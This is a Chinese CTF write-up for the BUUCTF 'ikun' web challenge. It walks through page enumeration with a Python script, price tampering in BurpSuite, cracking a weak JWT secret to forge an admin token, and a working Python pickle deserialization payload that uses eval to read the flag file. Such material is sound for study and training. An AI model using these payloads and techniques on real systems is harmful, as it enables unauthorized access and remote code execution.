BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun

BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun

鸡你太美

看一下网页
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514100613297.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ==,size_16,color_FFFFFF,t_70#pic_center)
这段视频真不错!!!好了,看题

开始

让我们先注册一个账号,登陆后竟然有¥1000

ikun们冲鸭,一定要买到Lv6

让我们买到Lv6,上脚本找一下


import requests
from time import *
url="http://6777eeab-1fd2-4a3c-b124-d2ac0b67fd9b.node3.buuoj.cn/shop?page={}"
for i in range(1000):
    r=requests.get(url=url.format(i))
    if "/lv/lv6" in r.text:
        print(i)
    sleep(0.1)

当?page=181时出现了Lv6(我第一遍做的时候在180页...)
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514101541315.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ,size_16,color_FFFFFF,t_70#pic_center)
这价格有点高...话说有这些钱为什么要买这个东西
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514101724755.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ
,size_16,color_FFFFFF,t_70#pic_center)
有一张8折优惠券,但钱还是不够,所以BurpSuite抓包改。

![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514102813726.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ==,size_16,color_FFFFFF,t_70#pic_center)

repeater一下
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514102859861.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ,size_16,color_FFFFFF,t_70#pic_center)
出现b1g_m4mber,访问一下
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514103015329.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ
,size_16,color_FFFFFF,t_70#pic_center)

只允许admin访问,打开cookie有JWT,JWT在线解码
将payload的username内容替换为admin,加密生成JWT需要密钥。
有大佬已经写出破解工具了
https://github.com/brendan-rius/c-jwt-cracker
下载完后,在该目录文件夹下,终端输入make
![在这里插入图片描述]( https://img-blog.csdnimg.cn/2021051410420535.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ,size_16,color_FFFFFF,t_70#pic_center)
解出来密钥为1Kun,伪造JWT
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514104350710.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ
,size_16,color_FFFFFF,t_70#pic_center)

BurpSuite抓包,改JWT,放包
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514104645429.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ==,size_16,color_FFFFFF,t_70#pic_center)
看到源码泄露,www.zip打上下载。

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

有后门,是python反序列化。

 @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

但没学过python反序列化(=_=),上大佬脚本。python2去跑。

import os
import pickle
import urllib

class exp(object):
    def __reduce__(self):
        return (eval,("open('/flag.txt').read()",))

a=exp()
s=pickle.dumps(a)
print urllib.quote(s)

![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514105159735.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ,size_16,color_FFFFFF,t_70#pic_center)
生成的payload,成为Lv6时BurpSuite抓包,改become,然后放行,得到flag
![在这里插入图片描述]( https://img-blog.csdnimg.cn/20210514105337254.png?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNzkzOQ
,size_16,color_FFFFFF,t_70#pic_center)

posted @ 2021-05-14 10:59  AndyNoel  阅读(252)  评论(0)    收藏  举报